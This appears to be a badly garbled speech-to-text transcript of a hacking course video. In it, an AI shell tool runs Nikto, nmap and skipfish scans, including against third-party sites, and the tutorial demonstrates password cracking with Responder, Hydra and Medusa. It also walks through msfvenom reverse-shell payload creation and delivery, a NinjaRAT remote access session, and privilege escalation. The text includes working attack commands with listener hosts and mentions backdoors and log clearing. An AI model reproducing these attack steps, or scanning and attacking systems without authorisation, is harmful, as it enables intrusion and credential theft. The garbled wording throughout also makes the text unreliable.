website, then we can see here. So it's take a time taking process also. So the target IP, the target name, target host name, the port, and started time zone. So we can look here what else the results we can get from here. Let's just look this. No CGI directories are found. So we already discussed about a CGI directory. So here we not yet found any type of CGI directories in this targeted domain. Index.php uncommon headers minus x redirects by found with an context by WordPress. Now we can look here. We can also get the backend of the database like a WordPress here. Now we would like to look here. So we not get even including with the CGI directories for this. So it's been time taking process for this. So we need to wait here. So let's see what else we can get it here. So because it is by hosted with some other targeted website that need to be give a request and response here. That's why a little bit late. So when you're doing with an inbound penetration testing, it's very easy. When you're doing with an outbound penetration testing, it's quite difficult. You need to wait and it's take a time processing. Then if you quit in between, you can't able to get what else you are looking. So you can look here, web server returns a valid response with the junk HTTP method, which may cause a false positive. We can look what else we can get it here. Either it's a targeted of WordPress website. We can get with the WP admin, WP contents, and WP includes XYZ things. Where he was used this also, but it's none of this one matters. Let's see what we can get it from here. So it's almost all will take a long lengthy time process also. Now we would like to try this one. So if you want, we can try with us another targeted with a domain. Now let's just make it as a little bit big. So in this testing case, we do not get anything else. So it's a time-taking process, okay, to understand XYZ things. So we would like to come back here. We just try, where is this another one, port 80. So we would like to look this. Now let me I just copy this. So just open this link in new tab. So it's like a turkey Linux. So just entirely just copy. So now in this case, so now I just type here as anicto minus. Then let me I just put here as one more time. So a time-taking process also. Let's see what else we can get here. So it's a time-taking process. Otherwise, you hosted is something else. So I would like to look here as, I would like to try my local IP address. So just type here as anicto minus h 192.3.8.821. We would like to look this. Even you can look here. HTTP method is a put method. Allow a client to save the files on the web server. Delete. May allow a client to remove the files on the web servers. Move. May allow a client to change the file locations in the web servers. You can look options. Public HTTP methods options. A trace, get, head, post, pro patch, MC call, put, delete, copy, move, unlock. Then just type here as delete. May allow client remove of the web servers. So what is in my local server which I was hosted, that is give exact information and report to a remote host. So 11 items are reported to a remote host. Even you can get it here if you have set up something here in the backend. That's it. So it may take a lengthy time process. So we would like to try as another one host as, now let me just type here as .com. That's it. So you don't need to worry about to put anything else like the IP address. So you just need any one of the. So it may also take, when you go for a target, it may take a time process, a time taking process also. You can look here, no CGI directories for. It may take the time process to describe all things here. So it approximately is how I prefer to say. Now if we would like to look here, this is also the same thing. That's it. So it may take time taking process. So beautify informations here. CGI directories, that's it. So it may take a long lengthy time, 10 minutes, 20 minutes, 30 minutes. You need to wait with the patience. we would like to try as any other things we would like to here. We don't think else to perform here. So error. Let's read the host. I lost error handling with HTTP response. So the block now. So not able to reach over there again because the host is hop. So in this case, the same thing. We just need to use the valid things, and one will be worked. That's it. So we have completed this vulnerability assessment. This concludes the demonstration of checking a vulnerability in the target website using the name. So guys, now we would like to hear as a vulnerability assessment using with AI. So what's this a vulnerability assessment? So attacker can leverage a AI powered technologies to enhance a AI automate their work. So you can launch any type of target website as a Nicto scanner, otherwise a type of scanner with so AI can perform on that to find a vulnerability and instead of your target. So let's here is you can try to ping here as your target address is 192.168.18.72. Let me adjust this. We just try as clear. Now, let's we just need to use here as a for this one. We just type here a SGPD. Just put it as the chat. In the chat, what you just need to put here in the chat. Then you just need to put as Nicto. Then just put here as a shell. Then your command. Not Nicto. Execute is against the URL is you just present your URL as HTTP, then you just present here as 192.168.18.72. Identify the potential vulnerabilities. That's it. Now, like this, so you just try here as execute. Now, the Nicto will take a lengthy time process to perform all these things. Then later you can get here. We just need to wait for this as Nicto to give you the right results. So it take a little bit lengthy process also. Then if you want to try as a another domain, let's copy this one. Let's come back here. Let's just type as a paste this, then you just change only the targeted domain as HTTPS. You just present as a github.com. That's it. Let's see here. That's permission is denied, but this is required as a root. Zero host is tested. Then let's say you would like to test here as I just provide here as hacker1.com. Now, we would like to try here. I would like to try to execute. Now, you can look here. Virus is found is 0.0.1.1. IP is found. Set cookies put here. So, where it's over getting the right results, we will have to wait a little time also to get and perform our actions. So this is with as any Nicto scan. That's it. So then after you can provide this perform either you are telling you as a activity to launch any against the title of a hacker1.2 to identify potential vulnerability. Then you can provide I would do so. This will take a lengthy time process. So I'll do this now. I would like to look this. I would like to put this as a testing things. Let me put here as a as what we would like to perform as a vulnerability scan. As a vulnerability scan on target. Just put here as HTTP a test php.oneweb.com. Now with whom you need to test this as you took, otherwise URL grabber, otherwise something else. What else is available there? So your file line system, just mention that Nico, and that's it. If you want to present as a Nicto and present the result here, present the results here. Like so you can look at Nicto minus h put cat. It will have that. So this is also the same thing, but it will take a little bit of the process also. So that's it. As this is a good step. So here you have seen the first of results. It has Nito. You can look here. A cross-domain.xml contains a fully wildcard end. You get that wildcard end. You have a dust gap completed. If you try as a targeted type of optional domains, other web domain, so that will take most time away for you. So that lengthy time process to process that all. So we have done this. So this is how we can do the domain the window. That's here. So where we saw as another like a number scan with map here. So this is very interesting. When we are trying with an let's we like to try here as a SGPT. We just put as chat. Then here we just need to put as a I would like to put as a simple as a vulnerable. I just put here as a shell, and I would like to try here as a perform vulnerability on a target. I would like here as bugcrowd.com with I don't put as a crowd, so it take a lengthy time process. All big ones I just put here as a cloudflare.com with the nmap. That's it. I want. We will have to look here. So it's also take a little in the process. Let's look here. So this estimated time is 17 seconds. So we can wait and see what is this results we can get here. So we are more away to look the results. So where it was broadcasted is sometimes we would like to look here as discover the host address. Now, we would like to get a Nmap script results. We would like to get a Nmap. Then after the Nmap scan report, view what is there presented. So Nmap scan results will take a link time also. Now let's move to look here. So this and all will take a link time process. Click here, and get this Nmap results. So why it's taking lengthy process? So it will go like this one without here. So you can try with your targeted address. So the villain. Okay, so it's take a lengthy time. So I just it as it. Let me just type as clear. Let's type as enter your password. Let's put yes. I think it's taking me a more lengthy time process here. Let me like back. So this is outside. So this is how you can perform the vulnerability scanning with using as app. So now let's like to come back here. So I think it's not taking that. So now let's do a vulnerability assessment using a script. So it's more interesting. So we create your own Python script and that can execute. So you already have as a shell.sh with this. I just type as cat.sh. Sorry, cat. Sorry, what is this? Uh, cat is scan.x. So we have targeted IP address all everything. So I just type as SGPD. You just put start as a I would put as a scan code. You just put as a shell. Now just need to so sorry, I would like to create a code and you just need to put here as create a Python script to run a fast but compressive and scan on the IP addresses in scan.txt that they execute when this will scan using a network against each access. So this will be a lengthy process in first. So this will more than 2 minutes. So it will be a Python script. So this written a Python script as input the process and define nmap with iris a print nmap with nmap 34 what I check if it true ever. So if you to try this one, let me put here as what is a scan.txt. So return entirely scan.txt as nano nmap.py. That's it. Let me add here as like I just put here local x. I just put as I just put as earlier I just put here as 8.3 and now it will automatically run because there is a txt file. So it's running executing every command. That's it. You can look here in this case 84408080. That's it. That's it. So it's lengthy process. So that's why I want to find this here. So this will take a little time to execute and everything. That's here. That here. So we have done anything else mistake from here. That's it. So we are everything is right way. So it will go a lengthy time process also this one because as a scanning will take lengthy process also. So we have already created this endpoint script. So we can create any of source code. So that's no worries. So we have created as a file also here. We have executed everything. So just that. So guys, now let's we'd like to go back here as we saw as the one scanning is fish using a AI. So what is a skip fish? Let's view back here as so let's like to try here as direct as skip fish. So let's view back as a SGPT. Just put us a chat in chat. What you need to mention here. I would like to go here as direct as a shell. Perform a vulnerability set on target URL. So present your target URL is test.php.vulnerweb.com with skipfish and display output. That's in Firefox. That's why. Let's would like to look at fish output that is from output. Let's we would like any. Let's we would like then let's that. So we would like to wait a minute. So there is now 4:38. It's a little bit up high is like it's. Let's we like to cut this 40. Okay. So this character is TCP handshakes is 41 total. It's like we would like to look at. You take more depth and find split values. So we are doing that. And also to get a result as accurate also. I will wait a second and we will try. So that's okay. I just here a scan is read. Report is there as a output as a index HTML. Let you have this as a file. As where is this as a output? We have a lot of things here. Your foot. Let me. Where is this? So here's an output. This is index open it as a Firefox. So where look here? Signature match detected with the highest where you can click on sources. It get request or image.php with the file as a cart id.php with the shell id. 200.php so where they can request the image.jpg and next automatically. Here where w.image.php on. So that we have it here. So you can observe everything here. So while working with this is quite easy way to perform. That's it. So here you can also get as result as output. Like you can look here, scan data, and everything. Let's just close this. Access vector the common button. So if you try to open using the tab, it shows as error. So valid results will get here. Again, that's it. This can perform with the air. That's it. So now we are discussing about this system. Some handles of exploiting a computer system to gain unauthorized access on or extract data. In critical aspects of pen testing and ethical aimed at addressing a security system to prevent email exploit. So what is of system hacking? First phase. So let me hear the phase is reconnaissance. So it will like different about targets such as spreading version, one ports, and all soft. So we present scanning, scan, and much more. Scanning enumeration. Second one is scanning and now scan for vulnerabilities and memory extra details like user shares and premises like Nito, OpenVAS, NISS, everything. So gaining access, identified to gain access our target system. Like we can exploit, like exploiting the vulnerabilities and the system, creating attacks like force phishing and social engineering. We would like to do the social engineering and everything. Now we would like to also like privilege escalation. Escalate from a regular user account to an administrator account. Like methods like exploiting vulnerabilities for cracking or connections conversions. First, we would like to layer as a portion endpoint and PS64. Then also we would like to utilize some others. Lean enum integrations. Then that's we have. Then that's it. We would look as maintaining maintaining the access. So setting up a backdoor trusted mechanism to ensure a future acts. Methods like installing a rootkits or setting hidden or circles, and covering tracks, deleting or altering logs to avoid additions. Methods like log template, claim accessory, like clear it, like restrict, input everything. Like systems like password tracking, disattack, red holes, tables, hashtag, enable, key logging, and exploit vulnerabilities, and in the middle attacks, sniping, social engineering, anything we can do here. So this is just in about a system hack. Now further cutting about this one, talking online to hack system password user as well. So let me. So now we are going to do a scope of attacks to crack a system password using a responder. So what is this a responder? So responder is a popular open source tool used to conduct network attacks, particularly at Windows environment, designed to track using the network protocol like Lincoln, chaos and NT and NetBIOS name service, lead initial and exports. You can expand on this official hub repository. So we have already here. So without wasting time, we need to one. So let I just copy this expander. Let's just copy this Linux, just resume this. I would also a resume. If you want to text the great, now just try this. Then let me outline resume my wins. Then I do that for this. So here we would like to give section 1 with responder. I specify for the internet. However, network access by different permission traces using iPhone fig command. So better we would like to use this Linux. So now enter your password. Now let me just close this and this or thus it will be great. Now what we want to do is like Linux machine. Just is this just type close. Let me use this repository as respond. Oh, sorry, I have missed. So let's just so from the repository just go folder. Just so here I have people just type as there is no any program. So it is have with the CH memory to execute that. Let's here as Python is as responder.python. So you just run this one on SU, enter your password, you just type it as responder.python and to specify I is 0. Now it was listening now. If it listens, then switch to your machine, you ask type just run, just anything and so stop and stop here. Now let's come back here. Look here, it was poisoned. Where here service dominate X and exception poison server sent that the local is answer and get back to that yes. It does not. Now we would like to look this opera this responder loss where we can get here. So I'm not here anything here. So before that, so I'll try my so I try as Windows and stuff register it. Then I run this. Then let's see what else I've got here. Anything else from my system. Then I try to run this and we can't connect to the file share. Okay. Let you just type this and try to run this. Let me just apply this. Now not to get anything. So you get log files here and we start from here. So we not get here. Now let me just try this again. Now try now it's 0. Now let me just clear something. Or not comment. Just type No, hashtag RDP. No, it's not anything else here. Now let's see list the events with 443. That's it. So we are getting results here here. So once we get here, let you here. So once you just run data things like CEH, so what we can do write the same as CEH2, what I would get as results. It was not running in my system. So we want to run our XYZ. So when you get it is as similar like the this is like we like look here. This is an LS hash. So you can get it on this hash. And you can see this hash just need install as John network. So that is just as John in the hash. So here you just write as John like John wordless hash no such file or hash just file. Where is this my hash? Oh no, hash less. So you can look at hash like just wordless hash. So this is just type I'm not sure. Like this. Let me just read. So once you have that hash, so you just need to use your wordless, otherwise it will not. So you see I have got here as a meeting. So this is hash. It was cracked. So I just you can type this as password. So the active on attack crack the password as respond. So like this. So here in this case, job. So there it used only the NTMSs. So it was on the password. Similarly, so if you use it, so you specify all the password list, you can find the password here. That's it. So guys, now we have a system using L0 PAT crack. So this L0 crack. So L0 PAT crack working on recovery too. For every especially by L0 PAT hacker, group the rate of 99 is widely used by synchronous and penetration tests. Password analysis are cracked. So what are the we get here? So main key is we get like password class instructions or password sent, be that cracked report access repos and data accessed with password databases. So we can use in like interesting password recovery, security, cracking NTML and LMS hashes. And first we would like to install this L0 PSG crack. Let's start yes. Right launch. Now let's click on next. Click on free. Launch this. Click on next. Coordination. Not one. Yes, it was one. Now, before it was like now it just looked like password auditing wizard. Now just click on next. Now desktop like Windows XP, otherwise XYZ things. So we just need to look which one I would like to try as Windows. And I just type yes. The local machines, otherwise they request a local machine administration privilege access, otherwise you just choose a target system as Windows. We have to I like to choose a remote machine and just click on next. Host is what is my host? I would like to put this eternal. It's this is my target IP address, so just copy use a specific user credentials. I just type one. And I just put my password, then I just paste this. Now you just click on next to a password audit. Now just click on next. Generate a report in documents. I don't want documents. I have to get to the desktop. Okay, come back here. So I want a desktop report. Process, so I just get in documents and in HTML format, just save, then click next. Run job immediately. That's it. Then click on start. Now just close this. Now it was starting here. Now let's look. If that system have anything else that we give us anything results. If not, we just need to look like passwords, inputs, reports, queue, perform was with a single validation. So it was failed to download. So it was failed due so just as enumeration. In order to new session host, yes. No. Sessions, yes. I closed the session. It was in progress with the same time. Issuing with the first hunting events and in any type of CR. Let's like to try here as a new session. Operation in queue. Here it not anything as queue. Session as modified to session will lose your yes. Yes. Just so now we just look as password now just next the local machine. So I don't want with the remote machines because in missions it may take a long later process to a password right now just next now just generate a report in the HTML browsing the desktop. I would like to change test just save this then click on next run this job immediately then let's look now that's what's currently screen I can hear which is active this which is passwords accounts where which is called for administrator NTML hashes NTML passwords so take a lengthy type of practice so the password hash not act built-in account for administrator with a guest user a default instruct this and NTML hashes that's it now you showed documentations in the base accounts that's it that's it now access found here so this take too long analytics and if you have a penetration test you can use S0 to track to all answer password which is in the target network and later enhance your next by putting a strong password part of any system with any passwords controls the dimension of all passwords using S0 to crack that's it so we have created this one. So guys, now I'm discussing about a system hacking with apps. In a system hacking case, system hacking cases like a getting of AK files and reverse and Windows as CA files, Linux files and data conversion. So I'm going to perform even system like clear cracks and crack words like using Hydra and John Ripper and many other things. So now we like to look also like crack Medusa and much more. So let's have a look it out here. Like where we want to here in this like a password you would like look like a civil crunch crack OPA attack and others. So we are not we can achieve anything else with this. So now we would like to perform a search to see initial otherwise HTTP. So let's like to come here. This is my vision as a event. I have every for like different so just a crack as a more possibly. So now let's we would like as like you would like to as a SGP just here as a like this. Use a hydrogen searcher for target IP 192 instead of 1872. Use a user external.txt file where the file's available location. So you need to improvise if you not mention also does not matter. Just execute this. Now it will start back the password instantly. That's it here. So this is a part of combinations will stop immediately. So even if try here as such a PSPL, enter your password so you have linked successfully now just type as I back to here as a PSPL. Now it's exit. Now let me I would like to go as now I would like to as now as a FTP. Let's just mention it as FTP. Let's you can look here. Let's go here. Also crack password without taking much time because I already created a user and password here. So in the place mention choice is your question. Like you would like to go to password so you can use a Medusa. No me I can mention as Medusa. Now let's we can try here as a FTP and your target right as and enter the password. So you have log here as this way. So you take a lengthy type process. I just need an exercise type as a exit. So once done, now let I would like to put here as a clear. Now let me. I would like to use here as now I tried as I don't know I would try as a end crack. Crack. You look here. What is the results we can get here? And I put user details and password. Then try to for as exit. Now for execution. N characters as scan and package. So where you enter the name and password. It's simple as easy way to crack. Now you want to type as a FP, otherwise any type of a great force. So it's simple. You just need to write as a simple rock here as such. That's it. Now it will try for as execute. No, in this case, port. You can mention what type of port you need to crack. So with AI, you can do multiple things. So that's why AI is more. So you can see the password is cracked. Now like we will go here just as we have to go here as a Medusa. Medusa. look as a to popularize, we would like to look here as Medusa. So Medusa post of the state or 72 and it's you minus m for as a type for as such. Now let's check in the Medusa all the right things. Let's would like okay. But in this case, we have to understand this Medusa. And let's would like to just let me. I'll utilize now as OP attack. Let me. I here as let's we can see try to assume not here anything else. Let me just check this here. So it's try to land as this one as Hydra. Hydra is the best one to crack. So simple to crack the passwords. That's simple. So it's there's like multiple things like extract and the display attacks the files for actions and run against the user. That is XY. That means a several dictionary was only used as part. Run a word in a dictionary to get in addition to stand a dictionary and attackers and the dictionaries contain entries with a number of symbols or X values. So to crack a successfully the passwords. So this way you can do the with a shell GPT using this one. That's it here. So now we have to creating a payload using a shell GPT as a GPT. So let's like to create as like as a SVT. Just type as a shell. Just put here as a use we create AC payload. Host and interrogate. I just want to straight out after 122 and import. So just need to here and import as step by 4. Now to create a payload here. Let's be like here. So it creates with us 86 meter of TCP with a host and it is with LDAP. So even if you create specific like Android like what you call again like Windows for EX files and everything. Let's we would like here. I'm trying to execute this. So here as a left. Now to create another thing, let me just put as this as a binum we have done. Now I would like to get this one as a version. Okay, let's would like to use as a HPT. Let's put it as a I would like to go directly as a chef. Then let's would like to use HPT here is not come. Then it will be a problem. So just put it as source. So as you enter your password. Let me just type it up here. Now look here as shell. Let's put it as use. And the big console to start a listener with host. So let me just put as a host equal to 22.168.22 and import double port. Now we'll start everything like to for generic paper shell, get lhost and set up and run. So that run everything now. Let's be back to it. So you just transfer this one to the your client here payload here. So this is in your client. Right? It was started. So you try to execute this one as a payload.slf terminus DNS. So you just need to look let me out as sudo service as a apache plus a status now let me out here as a running. Now let me I would like to let's I would like to just like last here. We just put as last month. Okay, sorry. Last month L has very little share. Now can move as a payload.elf to as a where a www. Let's put here share. Now try as I have here as payload.elf. Now let me apply back here. Then I just enter my password. Now I would like to go back here. Then payload.elf 1.2 done. Now just need to get as a share where we have payload.elf that is done. Back. We just need to look at how to have a bounce. Now just this payload.elf. Let me just copy. Just put as a as X. So I just give as a permission. Let's try as now I just try as a payload.elf. That's it. Segmentation all up. Now let's be back here. Session is one resource. So I think one is connected, but it's a session only die because it's not created or is properly. That's it. So we just need to create a manual. So with AI, you just need to mention the right person only you will get it. So in like Android, Windows, or multiple things out in this way. That's it. So guys, now I'm going to do as vulnerabilities on exploit sites, vulnerabilities on sites. Any of processing of adjusting security or hacking, penetration and research. However, it is important to emphasize that such activities should only be done with process and should follow a legal ethical consideration. Like so, that's it. Now, about this XDB.com, just here, just like exploit.db.com, just visit exploit.com. Then, search here, what tells your link? Like looking for as SNMP, we also have search for NP. Now you look here, get L6 content with press scripting. So just need to study this all. This one, it was really C programming. Now it was written at GitHub. You can find this product which who is done this. You just copy this back here. Let's just fill this this guy. It was written this DNS bypass token tactics. So a proof of concept with post-right loader which aims to integrate with the enhanced post-right evasion features. Now we would like to look this. So that's it. So here is not get anything else. So here now this we have done here. Now we would like to come back here. Now I would like to look as a dirty cow. No, we're not getting it. Then SH. No, I like to get as CMS. Same simple monster. We would like to do this. Very much examples with monster. So if you have monster, so I would do monster sensitive file by monster CMS. I guess monster CMS. This is monster watching. Introducing monster. Monster is modern and lightweight content management. So if you utilize this monster and if you hosted any type of target website, so it hacked otherwise it's there. Like you saw with the file 3 of target URL, the name and pass. That's it. Where the login with the URL with admin next directory with I equal to dashboard. So log with your name and password, login only, then you can get join and access with the string with active lowercase string with. So where you can get with the self token command. Get this I can use www, then you can go to this section. Fit and need to break. So this is using a file or so in the possibilities and you can use targeted search in your admissions. So this comes the demonstration of any one of these exploits such as exploit database. So guys, now we are going to do as exploit inside one of these and a VNC. So exploit inside vulnerabilities. VNC. So what is a VNC? Network. A session involves identifying web applications or email attachments and then remote access to the machine via VNC server. So how we would have to look at. So this type act will only be performed explicit functions in ethical and context such as specification with the written consent within a controlled lab environment or unauthorized access to a system is illegal or unethical. So this can be done through a cross-site scripting and shortening, messages document rights, offense PDF document, etc. Then we would like to set for that we walk to our call organization. Close this. Once of this, just try so I just need a little bit. Now I would like to add actors for our system hacking. So I just put an SH. So see SH, that's great. Now put type as I just write as MS payload for Windows. Then just type as here, then I just write as reverse CP. to specify as a platform is for Windows minus x86 minus files and x5. Then I'd like to specify like a host not able to get or achieve this one. So you need to try more harder until you can get it here. So this concludes the demonstration of how to gain access of remote system using an ARP bridge. So guys, now we are going to gain to a remote system using a NinjaRAT. So what is a NinjaRAT? So Ninja joining to gain access a remote system. However, does not seems to be a well-known tool or a framework with a name like Ninja Johnny. So these tools like used for a penetration testing or cybersecurity, it is possible to might be referring as misname a tool we can call like a rat. So it is like a remote system. So it's a misname as, so it's work like only as a remote access control, remote access tool. So it have a reverse shells or any legitimate tools. So first we would like to look this and how to identify. So I would like to utilize in this case scenario as a Windows 10 operating system in this case. So I would like to utilize a Windows operating system. One is with this. Now another one case I would like to utilize a Windows operating system 2019. So I already here have a Ninja unjoined. Now I would like to utilize, so first of all we would like to extract all here. So you just extract this which we was extracted. Now we would like to extract this also, and we just extracted this. So first we would like to close this. Now we would like to look here as joining. In this case we would like to look in the config. In this case, so we just type open. So here it's ports. There is no any type of targeted IP address here to connect this one. Now let me close this one. Now let's come back. Now in this case, now we would like to look in the Ninja. So in this case, so you just click on config. So here in the host, you just need to enter your targeted IP address. So you just enter your machine 192.168.18.a75. So my targeted IP address is ipconfig. So this is my targeted IP address. So I just close this. Then I just save this. You just write file. You just click on save. That's it. You just close this. Now we just came back here. So this is as save. Now let's come back here. Come back. Now I would like to where is this? Compress a zip folder. So we can get a more confusion in things here. So I just need to delete this. So I just need to delete. Now I just need to send to a compressed zip folder. In the name I just type here as I would like to look as hacking tools. Now I just need to put this hacking tool into with sharing with some other things. So I would like to look as a file share, file upload, and share files in secure sharing. So I just look this. So it shows a drag and drop. So I just drag and drop this. So it was uploading. So let it upload this one. Once it was uploaded, we try to go further here. So it may take a little bit more time. So it need to upload into their server first. File sharing, vtransfer, file transfer.io. So we would like to look this. We have fast and simple. So this one is a little bit good. Let me just try. Here also you're almost on the so this is very fast compared to this one. It's still not even coming, so I don't want to upload here. Now let's see what else we can get here. So I just click on this share button. I just copy this link. Now I would like to go to my Windows 10. In this case, I just come back here. Let me paste this. So here he also get a little bit something. Now you just click on this download. So you just receive here a download. Then we can see here we have get downloaded here. So I just need to close this. Then click on this. So I just need to get this one into the desktop. Now let me close this. Now extract here to hacking tools. Now we have seen here as Ninja version 2.1 everything. Now this is know-how here. Yes, it's came. Now once we have got it this, first of all we just need to run the Johnian. Then we just need to come back to here. So we just minimize this, come back to a Johnian. We just type to run this. Now it's came here. Press any key to continue. Now Johnian is listening on the port is 3707. Now we must send it to our victim file XYZ things. Everything is happened, which is taken over there. Now we would like to run now a Ninja. Like it's like a Tom and Jerry. It's like hide and seek games. This one. Now we just type run this. It also came similar thing. So we just press any key to enter. Now you can look here, access is denied, etc. things. Now go back to your attacker machine. Now look here, your attacker machine. So command not recognized. So just type list. You have connected with a targeted version. Where is one connection is listed here. Now which is that one is not displayed. Now we just type here as we just need to connect one. So just type here as a connect one. So connected to number 1. Now let's you just type here as what else you just type. Just type anything like you just what we would like to type here as you just type enter type. Then I just put here as a CMD command not recognized. No, you just type here as again. So we just change again like first of all I just put here as a change enter type here as a CMD. I have got it here as CMD. Now just type here as I have config. I got my targeted IP address is 192.168.18.127. Now I would like to show you here. Now I would like to look here as CMD. In this case, I just type here as IP config. You just look here as 192.168.18.127, where you have get your target IP address. Now let's come back here. You just type here as who am I? You got it here as Windows with administrator. Now the same results you can get here as who am I with the same 1BR8R. So you just look here 1V8R 64-bit operating systems. Now just type here anything else like help. You can get a lot of helps here. So this concludes the demonstration of how to gain access to a remote system using a NinjaRAT. That's it. So guys, now we are going to do as another topic as escalate privilege using a privilege escalation tools and exploit a client-side vulnerabilities. So now let's just do this. So privilege escalation and exploiting a client-side vulnerabilities are a critical steps in penetration testing. Like, what is a privilege escalation? So first of all, we need to know what is a privilege escalation. Privilege escalation involves for increasing the access rights of a user account on the system, like a vertical escalations, like moving from one lower privileged users to a higher privileged users, like system administrator to, like you have only like administration access, and from administration access to any system administration access. So this and vertical escalation. Then horizontal access, like gaining access to another account with a similar privilege levels like low, medium, high, critical. That's it. Now we would like to do this. So first of all, we would like to utilize the same thing. So the attacker machine is called Linux. So I don't require anything right now as Armitage. That's it. Now let's come back. So just type clear here. Now what we would like to do here is, now we just need to do AR as I just type here as MSF Venom payload for Metasploit reverse underscore TCP with the, so I don't need to write like this, otherwise it's just clear. You just type it as MSF Venom. Now we just type for payload Windows meter printer, then you just type it as reverse underscore TCP, then you specify it as a platform Windows minus a x86 minus f. Now just specify so no need minus a, then you just need to minus e, then x86, then you just type Shikata GANAI minus P. We would like to present this x00, then just type lhost equal to 192.168.18.68, Then minus F for as exe. Then you just need to save this one into as home pentest club. Then you just type sh. Then just type exploit.exe. That's it. Now let's see. So it will generate the payload. So I not yet give the L port. That does not matter right now for this. So now we have our exploit.exe. Sorry, I just type plus minus here. So our exploit.exe, which is available here. Now let's come back here. I just type sudo a copy a exploit.exe to here, where www.html and share where it was gone here. Now just type plus minus l. So where we have exploit.exe now in this. Now in this case, what we would like to do here is now we would like to start here. So I would like to copy only these things. Just copy. Now you just type here as msf console. Now let it start this msf console. Now msf console is started. Now we would like to utilize our normal things. So first of all, I just type here as clear for your good interface. So just type here as use exploit multi add. Then that is done. Now just type set payload. Then just type for a Windows. Oh, sorry, set payload. Windows metapeta reverse underscore TCP. Then you just type as set lhost equal to enter our target. Type here was 192.168.18.868. You just type here as exploit minus j jet. That's it. Now let it let's see what this will do. Now let me just come back to our Firefox, this Windows machine, and I just close this. This is no use. This no use, no use, no use. Now you just refresh this. So here you have exploit.exe. So you have downloaded this exploit.exe. Then you just run this. You just click on run. This is done here. A Metapeta session 1 is opened. Now let's see here. You just type so the Metapeta session will become here. So I just type get UID. So unknown command just runs sessions minus I1. Now I just write get UID where I have got the user ID. Now where we have got it this. So before going to here, now I would like to come back here. I just come back here, open this. I would like to get so now we have gained the access of the target machine with a normal privilege. Now our task is to perform a privilege escalation to attain higher level of privilege in the target system. So first of all, we would like to use a privilege escalation tools as a name called a vroot. So I would like to write very clear vroot .exe in the GitHub. So I would like to get this a vroot file here, a privilege escalation project from the GitHub. So now we would like to get this a, where is this, for Windows, here a vroot. Then I would like to go for a vroot a run.python. So I noted get for a Windows one. Now let's just close this. So let me, I just find here as vroot for a Windows. Here, we would like to look this new tag. So what else we can get it here? So it's also the same thing, but we not yet get this vroot. Now let me just look this. Yes, this one. So vroot is an post-exploitation tool for a check a common misconfigurations to find the way of our privilege escalations. A compiled version is available here. We would like to download this vroot.zip. So I just close this. Now let me what we would like to do here. It's first go to your downloads folder. We would like to go. So let's do that directly from here. Now let me, I would like to, so let me, I just open here as downloads folder. This is a vroot. Now just type here as extract here vroot. Why it's no have. Let's just close, come back, just go back here. So just type cd home Fantastic Club. Just type download. I just type here. Just type plus minus here. So here I have extracted here exe. So this is my file. Now just copy this one. Now what you would like to do here is, now we have got this vroot. Now just type here as you can look here as sysinfo. You get it here. Now just type here as upload home Fantastic Club. Just type downloads. Then you just type this one vroot.exe. That's it. Where it was uploading, uploaded is done. Now you just type clear. No, it not work. So let's type now we just type as a shell. Now we just came to a shell. Now we would like to run this as b-root dot, okay, where is this one, b-root dot exe. So I just copy this one. Now let me just paste it. Now it was running the b-root. Now entirely this was done. Now you can find a further vulnerabilities in the resulting of service attempt them to escalate a privilege in the target machine. Windows privilege can be used to escalate a privilege. These privileges including a SC debug or SC restore and SC backup and SC take ownership, SC TCP and create a token, SC load drivers and SC impersonate and SC assign primary token. B-root list are available privilege and highlights. If you have one of these, you are well and good to go. Now we would like to look here, start scan. So in this system 32, you can look here every informations you have got it here about your system. So I don't want to look all those things, so it's print. So we have exit here. Now we would like to get as similar like this one as b-root. We would like to get as, let's just open new tab. Now let me just type here as seatbelt seatbelt.exe for Windows. We would like to look this. So this take a lengthy time process to come this. So otherwise I would like to look here as seatbelt.exe GitHub. So this is a project number of hosted service keys relevant previous escalation. So this is, so we now have, this is the seat belt. So where we can get into this, so but we don't have that seatbelt.exe. So you can look here, you can take this seatbelt.exe, you just extract like this, a system.txt, this one, ghostpack.seatbelt. So how do we can download this? License mode, template, a seatbelt. So this you just need to make an exe file. So that's take a long lengthy time process to make an exe file and run. So we would like to look in this Kali Linux. So just type seatbelt.exe GitHub release escalation. So where we here, so this is only the tool, but we don't have this seat belt, so I can explain you here. So because it's take a long lengthy time process to convert. So I can look here, can convert, uh, so convert dot c uh, program files to exe uh, in online. So I would like to look here. So that we would like to install a Visual Studio Code, and we just need to get it done. So that's take a lengthy time process. We can't able to do it right now. So this is a seat belt. Now we would like to look this here. So you just need to import the same way. Just upload into the your targeted machine. Then let me seat belt. So this is the seat belt. So in this you can look here. So if you want to enumerate a seatbelt.exe, a group, a remote, so it will run the following commands like AMSI provider, antivirus, audit pool registry, all this information. So now you can look here from seatbelt.exe, a group all. So what are the group available in that? Everything will be extracted. Seatbelt users. So what are the users in the targeted machine? That will be extracted. Then Slack download, Slack presence, Slack workshops. So you can look here group Chromium. So you want to utilize in the Chromium place Firefox. In the Chromium place you can put Brave browser, etc. things. That Chromium bookmarks, Chromium history, Chromium presence, Chromium cookie, everything will be extracted here. So you can use all these commands here. We can't able to get this one. That's the missing part. We would like to do this one. Put the uh, So in this we can't able to done anything else. So now just come back here. You come to your Kali Linux machine. Now we just minimize this. Otherwise come to end command prompt. Now in this command prompt, what you just need to type? You just type run a post for a Windows gather smart hashtag. So it may have this machine is stuck. So can look here when I even lift this, it's not even. So the sessions, that's it here. So where this will be extract the NTML hashes though. So with NTML hashes, so you can crack online this one. So the mission is done. So this concludes the demonstration how to escalate privilege by exploiting a client-side vulnerabilities using a Metasploit. So guys, now we are going to hack a machine using a Metasploit and perform a post-exploitation post-exploitation using a meter printer. So first of all, we would like to use my targeted attacker machine is 192.168.18.a638 and victim machine is 192.168.18.a75. So I'm going to attacking with my targeted IP address to a victim machine. Now we would like to come back to our kernel Linux machine. Now let's just make it as a little bit big. Now let's just open that terminal. Now let's make it here as I would like to make directory here as sh cd sh. So I just type clear. Now we would like to create a MSF venom payload for Windows meter printer. Then you just type reverse underscore TCP. Then you just type it as a platform. We would like to type as Windows a x86. We'll just type Shikata GANAI. B. I would like to write the payload as x00. Then lhost equal to. So what is my targeted IP address? So we would like to share as config. This is my target IP address. Let me press here. That's it. File type is exe. Then we just need to save this file as both then sh. I would like to save this one as backdoor.exe. That's it. So now here files will be created here. Now in the file type, now we just type here as clear. Now you just make a directory. In the where www html and the share permission is denied sudo. We just copy this one. Let's just paste it. Enter our password. That's great. So we have created a directory. Now we just type here as chmod minus r755, this one where www.html and share. So we just need to give a permission. Operations is not permitted, so just type sudo su. Then we can get permission. So we just type enter, we just copy and paste it. Now 